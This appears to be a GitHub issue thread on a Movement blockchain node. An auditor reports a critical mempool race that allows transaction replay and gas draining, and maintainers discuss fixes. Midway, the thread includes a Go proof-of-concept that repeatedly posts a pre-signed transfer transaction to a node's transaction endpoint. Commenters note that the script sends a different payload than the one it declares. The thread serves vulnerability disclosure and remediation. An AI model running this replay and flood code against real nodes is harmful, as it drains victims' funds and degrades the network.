Open SA124 opened 3 weeks ago
Because of the sequence numbers, you shouldn't be able to actually replay transactions here by the time VM execution occurs.
And, ultimately, that's where such replay prevention has to take place. Fundamentally, transaction ingress through to execution QC can't itself be synchronized throughout the network unless CAP tradeoffs are CP. That is, even if you had synchronized the mempool to regard inflight transactions for a single node, you couldn't have guarantees about the mempools of other nodes without being CP.
However, you can still use this gap to attempt DOS. I think it would be difficult, however, in our current setup to run this through a single node because we don't actually pop transactions out of the mempool when piping through to block building. Instead, we only garbage collect which currently takes place on a fixed interval appropriate for block execution speed.
Over multiple nodes, this remains an vector for a DOS attack and may add credence to #339 . However, we could asses whether the validation performed at the VM-level is already performant enough--as the solution would involve tracking transactions in a similar manner.
Our audit is based on the 030fe011da8bd7eca75fa0a37197205767bef7ec
commit. Based on our audit, we have the following preliminary knowledge:
vm_validator.validate_transaction()
: Validates that a transaction's sequence_number
is higher than the current db_sequence_number
.
b. core_mempool.add_txn()
: Validates that a transaction's sequence_number
is higher than the current db_sequence_number
.
c. executor.execute_block()
: Validates that a transaction's sequence_number
must be db_sequence_number + 1
.executor.execute_block()
executes in blocks, meaning that even if the transactions within do not pass validation, they will still be saved to the database along with the block.executor.execute_block()
is executed, the sender’s gas fee will be deducted for transactions that did not pass validation because the node needs disk space to store illegal transactions.
(Of course, there is a vulnerability here where the gas fee is not deducted; see https://github.com/movementlabsxyz/movement/issues/409)Therefore, we can exploit this race condition vulnerability to launch an attack:
vm_validator.validate_transaction()
and core_mempool.add_txn()
validations and will be packaged into a block.executor.execute_block()
phase, only the first Tx will be successfully executed, while the other 9 will fail. Even if they fail, these 9 transactions will still be included in the block and stored, and the gas fee will be deducted from victim V.We have verified through a locally deployed test environment that the replay transaction issue exists.
These 10 identical transactions will pass the vm_validator.validate_transaction() and core_mempool.add_txn() validations and will be packaged into a block.
They will not be packaged into a block if they are identical. Blocks have B-Tree Sets as their transaction container. At some point during ingress, serialization, or deserialization, duplicates will be removed by honest nodes.
Would you be able to share the scripts and configuration of your local environment?
This can happen if the transactions are included in different blocks, which could be achieved via particular timing or sending to different nodes.
So, when we turn on #409 we will have to have solved this.
via particular timing
The particular timing here would presumably need to be that the transaction has been garbage collected, but not yet executed--since we don't pop transactions out of the mempool.
Hi, we build a docker environment based on the 030fe011da8bd7eca75fa0a37197205767bef7ec
commit.
package main
import (
"bytes"
"encoding/json"
"fmt"
"io"
"log"
"net/http"
"sync"
"time"
)
const url = "http://127.0.0.1:30731/v1/transactions"
var requestPayload = map[string]interface{}{
"sender": "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c9",
"sequence_number": "0",
"max_gas_amount": "1498",
"gas_unit_price": "100",
"expiration_timestamp_secs": "1755253215",
"payload": map[string]interface{}{
"function": "0x1::aptos_account::transfer",
"type": "entry_function_payload",
"type_arguments": []interface{}{},
"arguments": []interface{}{
"0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c8",
"100",
},
},
"signature": map[string]interface{}{
"type": "ed25519_signature",
"public_key": "0x18367b2687ee313cc3baea86d31619e5bef1158df4bb0f6d2476a9601e978ae2",
"signature": "0x771e15db6f57c9793db583e8a4cbe13d1a95ca47f1fcf375adb0728abc5f8b77a43de5a20bf699876d63f78418f87c257717dc5a0a24789af0ec79c1cf13af0f",
},
}
var requestPayload2 = map[string]interface{}{
"sender": "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c9",
"sequence_number": "2",
"max_gas_amount": "13",
"gas_unit_price": "100",
"expiration_timestamp_secs": "1755308158",
"payload": map[string]interface{}{
"function": "0x1::aptos_account::transfer",
"type": "entry_function_payload",
"type_arguments": []interface{}{},
"arguments": []interface{}{
"0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c8",
"100",
},
},
"signature": map[string]interface{}{
"type": "ed25519_signature",
"public_key": "0x18367b2687ee313cc3baea86d31619e5bef1158df4bb0f6d2476a9601e978ae2",
"signature": "0x45e9e00617dc0af6160412bada9588853e4a9cb7aea893e202efcfc37c735d9233b108f61b889e0a46e81860554df68611b807db24550efb5051e96617465503",
},
}
func sendRequest(wg *sync.WaitGroup, requestPayload map[string]interface{}, i int) {
defer wg.Done()
jsonData, err := json.Marshal(requestPayload2)
if err != nil {
log.Println("Error marshalling JSON:", err)
return
}
resp, err := http.Post(url, "application/json", bytes.NewBuffer(jsonData))
if err != nil {
log.Println("Error sending request:", err)
return
}
defer resp.Body.Close()
body, err := io.ReadAll(resp.Body)
if err != nil {
log.Println("Error reading response body:", err)
return
}
// fmt.Printf("Response Status: %s\n", resp.Status)
fmt.Printf("%d Response Body: %s\n", i, body)
}
func main() {
var wg sync.WaitGroup
numRequests := 200000000
for i := 0; i < numRequests; i++ {
wg.Add(1)
time.Sleep(100 * time.Millisecond)
go sendRequest(&wg, requestPayload, i)
}
wg.Wait()
}
The above Golang source code is the attacking code.
These 10 identical transactions will pass the vm_validator.validate_transaction() and core_mempool.add_txn() validations and will be packaged into a block.
They will not be packaged into a block if they are identical. Blocks have B-Tree Sets as their transaction container. At some point during ingress, serialization, or deserialization, duplicates will be removed by honest nodes.
Hello,
This is the Tx in the light-node Mempool:
pub struct MempoolTransaction {
pub transaction: Transaction,
pub timestamp: u64,
pub slot_seconds: u64,
}
The replay Tx is :
pub struct Transaction {
pub data: Vec<u8>,
pub sequence_number: u64,
pub id: Id,
}
The Block is :
pub struct Block {
pub metadata: BlockMetadata,
pub parent: Vec<u8>,
pub transactions: Vec<Transaction>,
pub id: Id,
}
There is no B-Tree Set .
@poetyellow
My bad I guess that must have been factored out at some point. It also looks like the usage of a BTreeSet
in the Memseq in-memory buffer, along with whole buffer, is no longer extant despite a lingering comment.
The other thing is that RocksDB uniqueness doesn't help us here because we are creating a key from the wrapped mempool transaction: https://github.com/movementlabsxyz/movement/blob/31386f74a2700920fec093775c221acdc9c6c7a2/protocol-units/mempool/move-rocks/src/lib.rs#L37
I believe the safety of each of the approaches alluded to in this thread is something like:
move-rocks
pool. BTreeSet
approach will account for the replay attack when the replay transactions would be placed in the same block, but not across blocks.BTreeSet
to make sure it doesn't happen within a block. The problem is, however, that you're still doing a fair bit of work on every node for this transaction. Per my comment about CP earlier though, I don't think there's a good way around this. The best thing to do would probably be position the mempool for independent scaling. We are also fundamentally accepting a fair bit of DOS risk by using a permissionless, public DA in the first place. So, some tolerance for this risk is presumed. @mzabaluev Going to move some of this over to our #475 while we're undecided on the best course of action here.
The above Golang source code is the attacking code.
I think this needs cleanup. requestPayload2
is the actual request that gets sent repeatedly while requestPayload
is ignored, is it how it should be?
3. DB-based validation after passing through the DA is safe w.r.t. this issue, but opens up more potential for DOS.
I have filed #526 to check if we can avoid this.
3. We can get the transaction by hash from the AptosDB it will have been called here during execution if the transactions was previously included, we could filter these out of the blocks.
Would transaction look up be sufficient with pruning enabled? If an attacker sends a sufficiently old transaction, it would have been pruned from the DB.
Would transaction look up be sufficient with pruning enabled? If an attacker sends a sufficiently old transaction, it would have been pruned from the DB.
In theory, by this point, the account sequence number check in the mempool is sufficient.
The only reason to use the transaction_by_hash
instead of account_sequence_number
for the filtering is that you might want to charge and deter the honest user for trying to aggressively send transactions that are close to the correct sequence number. You can do this by letting those transactions through the very first time to have them aborted in the VM.
Later on, i.e., after pruning. The mempool would check the account sequence number and deny these transactions up front. It loses the deterrence aspect. But, based on how far off their sequence number is, it's more likely these transactions are just purely fraudulent.
Thanks @l-monninger. I agree the transaction_by_hash
check will solve the replay problem at some added runtime cost.
This bit looks like it should be teachable to the users:
you might want to charge and deter the honest user for trying to aggressively send transactions that are close to the correct sequence number.
I believe #542 and #502 resolve this, though we still need to recreate the test in our test harness. @poetyellow should we reach out in another in a separate channel about re-reviewing?
LIB1-1 Multithreading Issue Leads to Transaction Replay Vulnerability Auditor: Movebit Code: Aptos Core Severity: Critical Discovery Methods: Manual Review Status: Pending Code Location: protocol-units/mempool/util/src/lib.rs#50; protocol-units/da/m1/light-node/src/v1/sequencer.rs#76; networks/suzuka/suzuka-full-node/src/partial.rs#134
Descriptions: In the light-node, when adding a transaction to the mempool, the mempool_util::MempoolTransactionOperations::add_transaction function is called, as shown below:
This function checks whether the transaction already exists to prevent replay attacks. However, this check can be bypassed. The tick_write_transactions_to_da thread of the full-node is responsible for writing transactions to the mempool, while the run_block_proposer thread is responsible for popping transactions out of the mempool and sending them to the DA. If a transaction A is popped out, it no longer exists in the mempool, and it can be re-added to the mempool. The prerequisite for this attack is that transaction A has not yet been executed, but this condition is easily met because the speed of writing to the mempool is faster than the speed of executing blocks. Impact: Under normal circumstances, repeated transactions that are packaged into a block will not execute successfully but will consume gas fees. A third-party attacker can exploit this by replaying a large number of user transactions, resulting in asset loss for the victim.
Suggestion: The fix is quite complex, it is recommended to refer to Aptos's replay prevention mechanism. A simple approach could be to revalidate transactions when packaging a block after the execution of a block.